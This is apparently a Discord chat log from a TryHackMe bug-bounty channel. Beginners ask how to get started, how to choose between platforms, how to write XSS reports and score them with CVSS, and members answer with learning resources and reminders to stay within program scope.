Hi friends, sometimes on Intigriti I see in scope: don't use automation tools, but then on the other hand they're limiting the requests for automation tools to 5 per second. What's allowed at that point? 😄
I have a question if I want to check libraries like libpng or others.
How do I start scanning? I have learned the basics of C++, but I feel like there is some code that is difficult to understand and I don't know which code I should focus on and which code I shouldn't focus on.
The basics don’t really cover that type of thing
So I need to keep learning?
Become advanced in C++?
I mean yeah sure but it’s not just about C++
That’s just a piece of the pie
So what do I need to get started?
I can recommend learning reverse engineering, assembly, source code analysis, data flow, etc.
Thanks
Gave +1 Rep to @lilac spindle (current: #22 - 402)
Hey Guys
I started doing BugBounty and I'm testing for XSS
How do you guys test out forms etc. without bothering the client?
Like testing the form a few times will spam the client and most likely confuse the receptionist
Hi guys, how much can you make per month with bug bounty as a side job?
Varies, there's no set number.
Do you have a more precise answer please
I know there's no set number, but what can one expect with a certain level?
No?
You could report a dupe, you could not get paid.
High number of us, if you have a question, just ask 🙂
Hello, I just asked this question in #cyber-and-careers but I feel it's more appropriate here. I am on HackerOne but didn't start yet. Do I need any kind of prerequisite or can I just start pentesting them and send them the report afterwards? Also, are there any verified good reports online that I can use as an example?
Hi, I made a bug bounty team, we are beginners, we need someone to help.
If you stay in scope yes.
Check out the pinned posta
Posts
Very helpful, thanks
hi
I have uploaded a test malware file to VirusTotal to check detection. It is responding while undergoing analysis. Is that a vuln? Sorry, I'm a newbie.
What do you mean by “responding”
Got a reply in my Telegram bot as "system is running",
which I print to detect the connection.
Guys, I've found an XSS on bug bounty, but I don't know how to make the report and explain how XSS can affect the website.
Usually, I create 6 sections.
Summary - this includes the summary of all the sections below, including its CVSS Base score and whatnot.
Proof of Concept - this should outline step by step how you came to that exploit so that they can reproduce it effectively. The more detailed, the better.
Impact - this should outline its business impact, how it can be used maliciously by attackers, etc.
Likelihood - this should outline how hard the exploit is to pull off. Is it just a copy-paste payload, does it always work, what are the prerequisites for the attack, etc.
Recommendation - this should include what your overall recommendation is, what you can recommend in case the first one can't be done, etc.
References - this should include any and all references you’ve used to create the report
Is it important to put a CVSS score?
I don't know how to calculate it.
I mean, I've found the XSS, I can exploit it, but I don't know how that can impact the website.
I just use this: https://chandanbn.github.io/cvss/
Easy to use illustrated graphical Common Vulnerability Scoring System (CVSS) Base Score Calculator with hints
I read which ones are relevant to the exploit then adjust accordingly
You need to understand the target’s business and how you can use that to create impact.
Can we chat a little bit on private?
I’d rather not. Maybe others can also pick up from this conversation and help you accordingly.
ok, no problem, thx a lot
Hi guys, do you recommend bugcrowd or hackerone for bug bounty hunting?
yes
Do you guys know about blockchain? If yes then can you help me ?
With what?
Hi, this is my first post (I think). I sincerely don't know how to start this post, so I will be completely honest. I'm "trying" to start my first bounty but I'm very hesitant because I don't want to mess it up (like click somewhere I shouldn't click on). What I'm looking for is a piece of advice or enlightenment? Or words of encouragement?
Hey @raven dock so I'm a beginner on the journey just like you. So 👋 across the internet 😃 in terms of messing up the way to think is you miss 100% of the shots you don't take.
So if you "click somewhere I shouldn't click on" you're actually doing the very thing you signed on to do. That's because most if not all of the people who put that application/API/mobile app on the internet weren't thinking like you're thinking. So that's your gift to them, thinking different.
I've developed software professionally and I promise you most developers are focussed on the happy path of their application. They want the data to flow to the next stage of their process. A very small number of them ask the question what would go wrong? And an even smaller number understand what can go wrong.
So there are no things you shouldn't click on. Clicking on the things you shouldn't in the order you shouldn't is the very essence of good testing.
So, go out there and grab that bug bounty, because the industry needs your help.
on the bug bounty platforms they will detail scope and rules of engagement. read them thoroughly and do your best to stay within those bounds.
They will also generally explicitly say whether or not they commit to safe harbor, meaning that they're not going to come after you for good faith security research. Not always 100% reliable but would rather work on something that offers it than something that doesn't.
Make sure you detail all steps you take with notes and screenshots - this isn't just to make your report better, but also to cover yourself.
Thanks 😄
Gave +1 Rep to @gleaming tartan (current: #2242 - 1)
Understood. Thank you too 🤝
Are there like beginner BugBounty hunter teams you can join so you can learn from each other?
I’d like to join in too
Me too
@thorny verge I'd love to join
I'd like to join.
Let us all join 
Why don't u make one @thorny verge
have u made the team guys?
I'm on it I guess xD
I am interested In Joining
That would be amazing actually! I've been wanting to get into bounties since I've been learning from THM, but after trying I realized I need some people to talk to, mentor and learn from. I'm 110% in.
Count me in!
me too
If anyone that hasn't been invited yet wants to join, they can add me.
How accurate are these steps?
Me too☝️😁
That's a pretty good list of things to do. Though XSS, Clickjacking and Rate Limit Bypassing are often out of scope.
xss is rare to be out of scope
I'm looking into getting into web application pentesting. Does anyone have any idea where to begin and what applications to use? I was learning in my college days and was looking to start again.
any tips and advice in starting over is appreciated
Then I recommend trying to build a web app yourself. It doesn't necessarily help directly, but it helps with understanding how a developer thinks. Look at theodinproject.com
Thanks I was looking at that specifically for web application pen testing
Gave +1 Rep to @lilac spindle (current: #20 - 418)
Then try your hand at some challenges in HTB or THM
You can always start bug bounty when you feel like it but I recommend watching others to see how their methodology is done
how to get started
We also have an ongoing Cybersecurity 101 event: https://tryhackme.com/r/resources/blog/new-cyber-security-101-path?utm_source=discord&utm_medium=social&utm_campaign=cybersecurity101
Introducing our Cyber Security 101 path! Delve into various tools and build a robust technical foundation in cyber security.
Not to discourage anyone from bug bounty but this is something you should watch.
https://www.youtube.com/watch?v=6SNy0u6pYOc
Bug bounty is an intricate game between the bug hunter, the clients, and the intermediary.
Like any game, it can be hacked. Like some games, it can be unfair.
Join Jason as he walks you through the darker secrets of bug bounty , tips and tricks to address them, and in some cases, commiserate that there are just bad realities to the game.
Jaso...
Huh. Did he retire his TBHM course? I can't find it any longer
If it's a bug in a room use #room-bugs
it was renamed and made into a new product. Costs 1K USD now. (3-day master class instead of the previous 2-day)
Is it too late to join? 😉
what is the best bug hunting community site?
h1/BugCrowd
They're good , I would also recommend you to check out Burp's Web Security Academy
hi sir
How much of cybersecurity and offensive security knowledge do you need to have in order to get started in bug bounty hunting?
Well, you don't really need to be an expert, but foundational knowledge about network fundamentals, TCP/IP, HTTP/HTTPS, DNS, common vulnerabilities and web technologies is preferred
Thanks for the response
A lot. Focus on web vulnerabilities
I only have the foundational cybersecurity knowledge
How do I get started, and which web vulnerabilities are the easiest to learn and master for a beginner like me?
There're no easier/harder vulnerabilities, you'll need to get familiar with as much as possible 🙂 . You can start with the following modules from THM; when you complete them move to something like Burp Web Security Academy
Hey, please respect our advertising guidelines -> https://tryhackme.notion.site/Advertising-5a34eace01a74169b37986bc67164aca
sure
Hi there, I am asking with the highest naivety if someone could start bug bounty (on which platforms?) without prior networks and built trust, provided that he would follow serious scope rules and guidance?
Thx
Also, I was wondering if it's aimed at particular subnet IPs or actually at production networks?
Thanks so much for these
I want to learn bug hunting. How can I?
Start out with these resources 😄
Learn how to attack web applications through interactive and real-world exercises.
This module helps the user become familiar with web applications, JavaScript, database systems, and SQL. Furthermore, it teaches the basics of BurpSuite so the user gains the necessary knowledge to conduct various web application security tests. Finally, it covers the OWASP Top 10 web application security risks.
In this module, we'll guide you through the complex landscape of client-side attacks, focusing on vulnerabilities introduced by XSS, CSRF, DOM-based attacks, and the complexities of SOP & CORS. Our journey will begin with an in-depth exploration of XSS attacks. We'll dissect various types, from reflected to stored and DOM-based, demonstrating ho...
so I want to join a bug bounty program for an online game. I'm very new to this, but what vulnerabilities or flaws should I look for? Or what stuff should I try etc
btw by new, I mean that I'm new to both bug bounties and finding vulnerabilities in online games. I'm experienced in networking, IoT, etc, and have a lot of experience in hacking in general
You can start with these resources #bug-bounty message 🙂
Thanks
Is there a big difference between CTFs and bug bounties besides the passive enumeration part? Like, will exploitation techniques from CTFs occur in bug bounties?
CTFs can be pretty unrealistic sometimes 😄
I see
You can also try PortSwigger Academy
If you want to learn bug bounty
Okay thanks! I'll look into it
Which online game?
Rec Room
Can anyone tell me where I can read cyber blogs related to web hacking
Check out these resources from THM 😄
Learn how to attack web applications through interactive and real-world exercises.
Learn about the various vulnerabilities that can exist in web applications and how to perform security assessments of web applications.
Thanks
Hey, is anyone a frequent Bounty Hunter on HackerOne? I have some small doubts
Just ask your question, we may or may not be able to answer.
How should I start bug bounty? Please help me
This could be a good place to start 😄
Learn about the various vulnerabilities that can exist in web applications and how to perform security assessments of web applications.
No, I am not 🙂
My friend, I am a university student, can I earn money from bug bounty?
Yes, you can, everybody can 🙂 . There're a lot of programs open to everybody 🙂
How long do you think this will take?
Well, you need to be really good with web vulns to get into bug bounty 🙂
It depends on you 🙂
do you have a roadmap for bug bounty
As I said, this THM path is a good starting point. After that you can move to something like Burp's Web Security Academy 🙂 . Then you can do some CTFs, practice, and then try your luck and skills on some real bug bounty programs 😄
Learn about the various vulnerabilities that can exist in web applications and how to perform security assessments of web applications.
You should be familiar with HTML/CSS/JS/PHP 🙂